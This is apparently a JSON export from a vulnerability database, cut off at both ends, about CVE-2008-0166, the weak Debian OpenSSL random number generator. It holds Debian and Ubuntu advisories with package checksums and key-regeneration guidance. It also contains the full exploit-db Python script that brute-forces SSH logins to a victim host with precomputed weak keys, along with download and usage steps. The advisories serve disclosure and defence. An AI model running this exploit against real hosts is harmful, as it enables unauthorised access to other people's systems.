e8273f5d123f892a81a155f14ba19b50\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_mips.deb\n Size/MD5 checksum: 875558 44074bce1cde4281c5abcf45817f429d\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_mips.udeb\n Size/MD5 checksum: 580130 b6b810d1c39164747e3ebc9df4903974\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_mipsel.udeb\n Size/MD5 checksum: 566168 97963ca9b6ada94445fb25b3126655e9\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_mipsel.deb\n Size/MD5 checksum: 992712 41c2bbe984553d693f21c3ec349ea465\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_mipsel.deb\n Size/MD5 checksum: 2255558 3c63936cd511975291b4230bef1a2e3b\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_mipsel.deb\n Size/MD5 checksum: 860506 d580fbeed6efd734245ea7a7bed225bb\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_mipsel.deb\n Size/MD5 checksum: 1649300 3315d1406f995f5b6d2a4f958976a794\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_powerpc.deb\n Size/MD5 checksum: 1002022 b2749639425c3a8ac493e072cfffb358\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_powerpc.deb\n Size/MD5 checksum: 895460 e15fbbbbcfe17e82bacc07f6febd9707\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_powerpc.udeb\n Size/MD5 checksum: 585320 61488ea7f54b55a21f7147fe5bc3b0f0\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_powerpc.deb\n Size/MD5 checksum: 1728384 539ee1a3fe7d9b89034ebfe3c1091b6f\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_powerpc.deb\n Size/MD5 checksum: 2210792 82e9e27c6083a95c76c5817f9604178f\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_s390.udeb\n Size/MD5 checksum: 643008 4861c78ea63b6c3c08c22a0c5326d981\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_s390.deb\n Size/MD5 checksum: 1632976 01d289d460622382b59d07950305764f\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_s390.deb\n Size/MD5 checksum: 951404 d92bb390489bed0abff58f7a1ceade6b\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_s390.deb\n Size/MD5 checksum: 1014308 487c24f2af25797a857814af7c9c0d0b\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_s390.deb\n Size/MD5 checksum: 2193782 f1fe472c802e929a57bd8c8560bd3009\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_sparc.deb\n Size/MD5 checksum: 4091340 970453ebfab8152c9c44ae210fbaa2a4\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_sparc.udeb\n Size/MD5 checksum: 539054 7be1258f74165c4b037e202d2048f8ce\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_sparc.deb\n Size/MD5 checksum: 1010536 6444d6cc6fd838c82716462aacd1cf84\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_sparc.deb\n Size/MD5 checksum: 2108000 ab0d0ccc72764a26b7767cace520b269\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_sparc.deb\n Size/MD5 checksum: 2126386 61ddc204ee650cdd0f2b56e358134e2b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-05-13T12:17:41", "published": "2008-05-13T12:17:41", "id": "DEBIAN:DSA-1571-1:611C4", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00152.html", "title": "[SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:17", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1576-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nMay 14, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : openssh\nVulnerability : predictable random number generator\nProblem type : remote\nDebian-specific: yes\nCVE Id(s) : CVE-2008-0166\n\nThe recently announced vulnerability in Debian's openssl package\n(DSA-1571-1, CVE-2008-0166) indirectly affects OpenSSH. As a result,\nall user and host keys generated using broken versions of the openssl\npackage must be considered untrustworthy, even after the openssl update\nhas been applied.\n\n1. Install the security updates\n\n This update contains a dependency on the openssl update and will\n automatically install a corrected version of the libss0.9.8 package,\n and a new package openssh-blacklist.\n\n Once the update is applied, weak user keys will be automatically\n rejected where possible (though they cannot be detected in all\n cases). If you are using such keys for user authentication, they\n will immediately stop working and will need to be replaced (see\n step 3).\n\n OpenSSH host keys can be automatically regenerated when the OpenSSH\n security update is applied. The update will prompt for confirmation\n before taking this step.\n\n2. Update OpenSSH known_hosts files\n\n The regeneration of host keys will cause a warning to be displayed when\n connecting to the system using SSH until the host key is updated in the\n known_hosts file. The warning will look like this:\n\n @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @\n @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\n Someone could be eavesdropping on you right now (man-in-the-middle attack)!\n It is also possible that the RSA host key has just been changed.\n\n In this case, the host key has simply been changed, and you should update\n the relevant known_hosts file as indicated in the error message.\n \n It is recommended that you use a trustworthy channel to exchange the\n server key. It is found in the file /etc/ssh/ssh_host_rsa_key.pub on\n the server; it's fingerprint can be printed using the command:\n\n ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub\n\n In addition to user-specific known_hosts files, there may be a\n system-wide known hosts file /etc/ssh/known_hosts. This is file is\n used both by the ssh client and by sshd for the hosts.equiv\n functionality. This file needs to be updated as well.\n\n3. Check all OpenSSH user keys\n\n The safest course of action is to regenerate all OpenSSH user keys,\n except where it can be established to a high degree of certainty that the\n key was generated on an unaffected system.\n\n Check whether your key is affected by running the ssh-vulnkey tool, included\n in the security update. By default, ssh-vulnkey will check the standard\n location for user keys (~/.ssh/id_rsa, ~/.ssh/id_dsa and ~/.ssh/identity),\n your authorized_keys file (~/.ssh/authorized_keys and\n ~/.ssh/authorized_keys2), and the system's host keys\n (/etc/ssh/ssh_host_dsa_key and /etc/ssh/ssh_host_rsa_key).\n\n To check all your own keys, assuming they are in the standard\n locations (~/.ssh/id_rsa, ~/.ssh/id_dsa, or ~/.ssh/identity):\n\n ssh-vulnkey\n\n To check all keys on your system:\n\n sudo ssh-vulnkey -a\n\n To check a key in a non-standard location:\n\n ssh-vulnkey /path/to/key\n\n If ssh-vulnkey says "Unknown (no blacklist information)", then it has no\n information about whether that key is affected. In this case, you\n can examine the modification time (mtime) of the file using "ls -l".\n Keys generated before September 2006 are not affected. Keep in mind\n that, although unlikely, backup procedures may have changed the file\n date back in time (or the system clock may have been incorrectly\n set).\n \n If in doubt, generate a new key and remove the old one from any\n servers.\n\n4. Regenerate any affected user keys\n\n OpenSSH keys used for user authentication must be manually regenerated,\n including those which may have since been transferred to a different system\n after being generated.\n\n New keys can be generated using ssh-keygen, e.g.:\n\n $ ssh-keygen\n Generating public/private rsa key pair.\n Enter file in which to save the key (/home/user/.ssh/id_rsa):\n Enter passphrase (empty for no passphrase):\n Enter same passphrase again:\n Your identification has been saved in /home/user/.ssh/id_rsa.\n Your public key has been saved in /home/user/.ssh/id_rsa.pub.\n The key fingerprint is:\n 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 user@host\n\n5. Update authorized_keys files (if necessary)\n\n Once the user keys have been regenerated, the relevant public keys\n must be propagated to any authorized_keys files (and authorized_keys2\n files, if applicable) on remote systems. Be sure to delete the lines\n containing old keys from those files..\n\n\nIn addition to countermeasures to mitigate the randomness vulnerability,\nthis OpenSSH update fixes several other vulnerabilities:\n\nCVE-2008-1483:\n Timo Juhani Lindfors discovered that, when using X11 forwarding, the\n SSH client selects an X11 forwarding port without ensuring that it\n can be bound on all address families. If the system is configured\n with IPv6 (even if it does not have working IPv6 connectivity), this\n could allow a local attacker on the remote server to hijack X11\n forwarding.\n\nCVE-2007-4752:\n Jan Pechanec discovered that ssh fails back to creating a trusted X11\n cookie if creating an untrusted cookie fails, potentially exposing\n the local display to a malicious remote server when using X11\n forwarding.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 4.3p2-9etch1. Currently, only a subset of all supported\narchitectures have been built; further updates will be provided when\nthey become available.\n\nFor the unstable distribution (sid) and the testing distribution\n(lenny), these problems have been fixed in version 4.7p1-9.\n\nWe recommend that you upgrade your openssh packages and take the\nmeasures indicated above.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch1.diff.gz\n Size/MD5 checksum: 275168 920f559caa1c8c737b016c08df2bde05\n http://security.debian.org/pool/updates/main/o/openssh-blacklist/openssh-blacklist_0.1.1.tar.gz\n Size/MD5 checksum: 3694141 05eec6b473990bff4fc70921b232794b\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch1.dsc\n Size/MD5 checksum: 1074 89930d72e9aff6b344efd35a130e4faa\n http://security.debian.org/pool/updates/main/o/openssh-blacklist/openssh-blacklist_0.1.1.dsc\n Size/MD5 checksum: 799 aeaa45e0bfbf7f966e3c7fca9181d99d\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2.orig.tar.gz\n Size/MD5 checksum: 920186 239fc801443acaffd4c1f111948ee69c\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/o/openssh-blacklist/openssh-blacklist_0.1.1_all.deb\n Size/MD5 checksum: 2121928 fa1ba22d98f91f18b326ee1bfd31bcbb\n http://security.debian.org/pool/updates/main/o/openssh/ssh_4.3p2-9etch1_all.deb\n Size/MD5 checksum: 1060 44ec3f52add1876d7b2c1bd3fa3cdbfd\n http://security.debian.org/pool/updates/main/o/openssh/ssh-krb5_4.3p2-9etch1_all.deb\n Size/MD5 checksum: 92162 9ae37916a6dc269318aff1215b6638cf\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_alpha.udeb\n Size/MD5 checksum: 198496 69fe6fc4002ec592e1756cee28ffd85b\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_alpha.deb\n Size/MD5 checksum: 782120 e5746f3c12a52f72b75cffee8e1c3a6f\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_alpha.deb\n Size/MD5 checksum: 100402 fda20ac6b68a6882534384e6ce4e6efd\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_alpha.udeb\n Size/MD5 checksum: 213724 118390296bbf6d6d208d39a07895852e\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_alpha.deb\n Size/MD5 checksum: 266518 be53eb9497ea993e0ae7db6a0a4dcd3a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_amd64.udeb\n Size/MD5 checksum: 183848 bd6c4123fe0e72f7565e455b25eb037c\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_amd64.deb\n Size/MD5 checksum: 244406 f70bf398d91eb4b8fe27cc5b03548b16\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_amd64.udeb\n Size/MD5 checksum: 171512 0b8afcf2b96ad97323152342e83dd3bf\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_amd64.deb\n Size/MD5 checksum: 709734 556332c58aeee82628d35ebf71d15ac1\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_amd64.deb\n Size/MD5 checksum: 99896 14d2f97314e7b4b6cb97540667d7f544\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_hppa.udeb\n Size/MD5 checksum: 189608 5267dec18e00f3e88bd53b3adfe23e62\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_hppa.deb\n Size/MD5 checksum: 100438 2ebd2edd75c440c062eaafab5a97b177\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_hppa.deb\n Size/MD5 checksum: 250556 1ca2aa080853748ab343381d9f9ffc6b\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_hppa.udeb\n Size/MD5 checksum: 198424 d99af9d81fe074f9b16928cae835ce56\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_hppa.deb\n Size/MD5 checksum: 733664 e6abc3231e7d274a5a73321ea3761974\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_i386.deb\n Size/MD5 checksum: 660432 16f0807e7871c23af0660e529837cb76\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_i386.deb\n Size/MD5 checksum: 224178 aaedc883a11ba7273e5ddeb496a3488a\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_i386.deb\n Size/MD5 checksum: 100000 fd41f726ff14b7f8ab0dfc1c6b43be2c\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_i386.udeb\n Size/MD5 checksum: 162630 f197dbdfe7a92bd4992d8c77c76b4488\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_i386.udeb\n Size/MD5 checksum: 154028 5df04dc7c5474b30e515047740bd0c38\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_ia64.udeb\n Size/MD5 checksum: 269868 1646034b7db5a862ea17d0d6928900ff\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_ia64.deb\n Size/MD5 checksum: 961594 394027253cbaeba863f07e7fee848dcb\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_ia64.deb\n Size/MD5 checksum: 101280 f3e421145857106615ce19cb05508a7a\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_ia64.udeb\n Size/MD5 checksum: 251840 24ba6fd53e10e754845fc4361257d0ff\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_ia64.deb\n Size/MD5 checksum: 338256 4ff1206f8f3c618f7bfd406f88b38841\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_powerpc.deb\n Size/MD5 checksum: 237040 b50b3e1ac8586eb55a5f06201dd3edf2\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_powerpc.udeb\n Size/MD5 checksum: 173322 f1fa458555b787a2b7fc786da7974b91\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_powerpc.deb\n Size/MD5 checksum: 700518 fd43ca106400be36545f31b955667e22\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_powerpc.deb\n Size/MD5 checksum: 101080 a5005e3e3447f8eb75d99746a2704b8d\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_powerpc.udeb\n Size/MD5 checksum: 168320 61848a42ed513d232fceea6eb335e315\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch1_sparc.deb\n Size/MD5 checksum: 218132 ce7a2f44e51c2fe6df31ec567ce65d28\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch1_sparc.deb\n Size/MD5 checksum: 99544 61cd81c98576feea92fb865856311b7d\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch1_sparc.deb\n Size/MD5 checksum: 639770 6085da0b96f1e9ee87abec7206eb7ef8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch1_sparc.udeb\n Size/MD5 checksum: 166706 99368689bddbc70f98ef5f51aa19051a\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch1_sparc.udeb\n Size/MD5 checksum: 158360 07bf438d8e0d3fd02ff37371ff8645d6\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-05-14T09:25:13", "published": "2008-05-14T09:25:13", "id": "DEBIAN:DSA-1576-1:61216", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00153.html", "title": "[SECURITY] [DSA 1576-1] New openssh packages fix predictable randomness", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:51", "bulletinFamily": "unix", "description": "A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of encryption keys in OpenSSH.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.", "modified": "2008-05-13T00:00:00", "published": "2008-05-13T00:00:00", "id": "USN-612-2", "href": "https://usn.ubuntu.com/612-2/", "title": "OpenSSH vulnerability", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T17:21:28", "bulletinFamily": "unix", "description": "A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems. (CVE-2008-0166)\n\n== Who is affected ==\n\nSystems which are running any of the following releases:\n\n * Ubuntu 7.04 (Feisty)\n * Ubuntu 7.10 (Gutsy)\n * Ubuntu 8.04 LTS (Hardy)\n * Ubuntu \u201cIntrepid Ibex\u201d (development): libssl <= 0.9.8g-8\n * Debian 4.0 (etch) (see corresponding Debian security advisory)\n\nand have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate.\n\nAll OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied.\n\nThis includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.", "modified": "2008-05-13T00:00:00", "published": "2008-05-13T00:00:00", "id": "USN-612-1", "href": "https://usn.ubuntu.com/612-1/", "title": "OpenSSL vulnerability", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T17:22:19", "bulletinFamily": "unix", "description": "USN-612-1 fixed vulnerabilities in openssl. This update provides the corresponding updates for ssl-cert \u2013 potentially compromised snake-oil SSL certificates will be regenerated.\n\nOriginal advisory details:\n\nA weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nThis vulnerability only affects operating systems which (like Ubuntu) are based on Debian. However, other systems can be indirectly affected if weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems. (CVE-2008-0166)\n\n== Who is affected ==\n\nSystems which are running any of the following releases:\n\n * Ubuntu 7.04 (Feisty)\n * Ubuntu 7.10 (Gutsy)\n * Ubuntu 8.04 LTS (Hardy)\n * Ubuntu \u201cIntrepid Ibex\u201d (development): libssl <= 0.9.8g-8\n * Debian 4.0 (etch) (see corresponding Debian security advisory)\n\nand have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate.\n\nAll OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied.\n\nThis includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.", "modified": "2008-05-14T00:00:00", "published": "2008-05-14T00:00:00", "id": "USN-612-4", "href": "https://usn.ubuntu.com/612-4/", "title": "ssl-cert vulnerability", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T17:22:13", "bulletinFamily": "unix", "description": "USN-612-2 introduced protections for OpenSSH, related to the OpenSSL vulnerabilities addressed by USN-612-1. This update provides the corresponding updates for OpenSSH in Ubuntu 6.06 LTS. While the OpenSSL in Ubuntu 6.06 is not vulnerable, this update will block weak keys generated on systems that may have been affected themselves.\n\nOriginal advisory details:\n\nA weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of encryption keys in OpenSSH, OpenVPN and SSL certificates.", "modified": "2008-05-20T00:00:00", "published": "2008-05-20T00:00:00", "id": "USN-612-7", "href": "https://usn.ubuntu.com/612-7/", "title": "OpenSSH update", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-01-31T22:29:09", "bulletinFamily": "exploit", "description": "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python). CVE-2008-0166. Remote exploit for linux platform", "modified": "2008-06-01T00:00:00", "published": "2008-06-01T00:00:00", "id": "EDB-ID:5720", "href": "https://www.exploit-db.com/exploits/5720/", "type": "exploitdb", "title": "Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit Python", "sourceData": "#!/bin/python\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n############################################################################\r\n# Autor: hitz - WarCat team (warcat.no-ip.org)\r\n# Collaborator: pretoriano\r\n#\r\n# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)\r\n#\r\n# 2. Extract it to a directory\r\n#\r\n# 3. Execute the python script\r\n# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5\r\n# - execute: python exploit.py (without parameters) to display the help\r\n# - if the key is found, the script shows something like that:\r\n# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121\r\n#\t\t Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240\r\n############################################################################\r\n\r\n\r\nimport Queue\r\nimport os\r\nimport string\r\nimport time\r\nfrom threading import Thread\r\nimport sys\r\n\r\n#This class only has a boolean, which will be True if some thread find the key\r\nclass End():\r\n\tdef __init__(self):\r\n\t\tself.end = False\r\n\t\t\r\n\tdef Finish(self):\r\n\t\tself.end = True\r\n\t\r\n\tdef GetEnd(self):\r\n\t\treturn self.end\t\r\n\t\t\r\n\r\n#This is the thread class\r\nclass Connection(Thread):\r\n\tdef __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):\r\n\t\tThread.__init__(self)\r\n\t\tself.QueueDir = QueueDir\r\n\t\tself.TheEnd = TheEnd\r\n\t\tself.dir = dir\r\n\t\tself.host = host\r\n\t\tself.user = user\r\n\t\tself.port = port\r\n\t\t\t\r\n\tdef run(self):\r\n\t\twhile (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):\r\n\t\t\tkey = self.QueueDir.get()\r\n\t\t\t\r\n\t\t\tcmd = 'ssh -l ' + self.user \r\n\t\t\tcmd = cmd + ' -p ' + self.port \r\n\t\t\tcmd = cmd + ' -o PasswordAuthentication=no'\r\n\t\t\tcmd = cmd + ' -i ' + self.dir + '/' + key \r\n\t\t\tcmd = cmd + ' ' + self.host + ' exit; echo $?'\r\n\t\t\t\r\n\t\t\tpin,pout,perr = os.popen3(cmd, 'r')\r\n\t\t\tpin.close()\r\n\t\t\t\r\n\t\t\t#To debug descoment the next line. This will show the errors reported by ssh\r\n\t\t\t#print perr.read()\r\n\t\t\t\r\n\t\t\tif pout.read().lstrip().rstrip() == '0':\r\n\t\t\t\tself.TheEnd.Finish()\r\n\t\t\t\tprint ''\r\n\t\t\t\tprint 'Key Found in file: '+ key\r\n\t\t\t\tprint 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host) \r\n\t\t\t\tprint ''\r\n\t\t\r\nprint '\\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org' \r\n\r\nif len(sys.argv) < 4:\r\n\tprint './exploit.py <dir> <host> <user> [[port] [threads]]'\r\n\tprint ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'\r\n\tprint ' <host>: The victim host'\r\n\tprint ' <user>: The user of the victim host'\t\r\n\tprint ' [port]: The SSH port of the victim host (default 22)'\r\n\tprint ' [threads]: Number of threads (default 4) Too big numer is bad'\r\n\t\r\n\tsys.exit(1)\r\n\t\r\ndir = sys.argv[1]\r\nhost = sys.argv[2]\r\nuser = sys.argv[3]\r\n\r\nif len(sys.argv) <= 4: \r\n\t port='22'\r\n\t threads=4\r\nelse:\r\n\tif len(sys.argv) <=5:\r\n\t\tport=sys.argv[4]\r\n\t\tthreads = 4\r\n\r\n\telse:\r\n\t\tport=sys.argv[4]\t\r\n\t\tthreads = sys.argv[5]\r\n\r\nListDir = os.listdir(dir)\r\nQueueDir=Queue.Queue()\r\nTheEnd = End()\r\n\r\nfor i in range(len(ListDir)):\r\n\tif ListDir[i].find('.pub') == -1:\t\r\n\t\tQueueDir.put(ListDir[i])\r\n\r\ninitsize = QueueDir.qsize()\r\ntested = 0\r\n\r\nfor i in range(0,int(threads)):\r\n\tConnection(QueueDir,TheEnd,dir,host,user,port).start()\r\n\r\n\r\nwhile (not TheEnd.GetEnd()) and (not QueueDir.empty()):\r\n\ttime.sleep(5)\r\n\tactsize = QueueDir.qsize()\r\n\tspeed = (initsize - tested - actsize)/5\r\n\ttested = initsize - actsize\r\n\t\r\n\tprint 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed) \r\n\r\n# milw0rm.com [2008-06-01]\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/5720/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "=========================================================== \r\nUbuntu Security Notice USN-612-1 May 13, 2008\r\nopenssl vulnerability\r\nCVE-2008-0166\r\n===========================================================\r\n\r\nA weakness has been discovered in the random number generator used\r\nby OpenSSL on Debian and 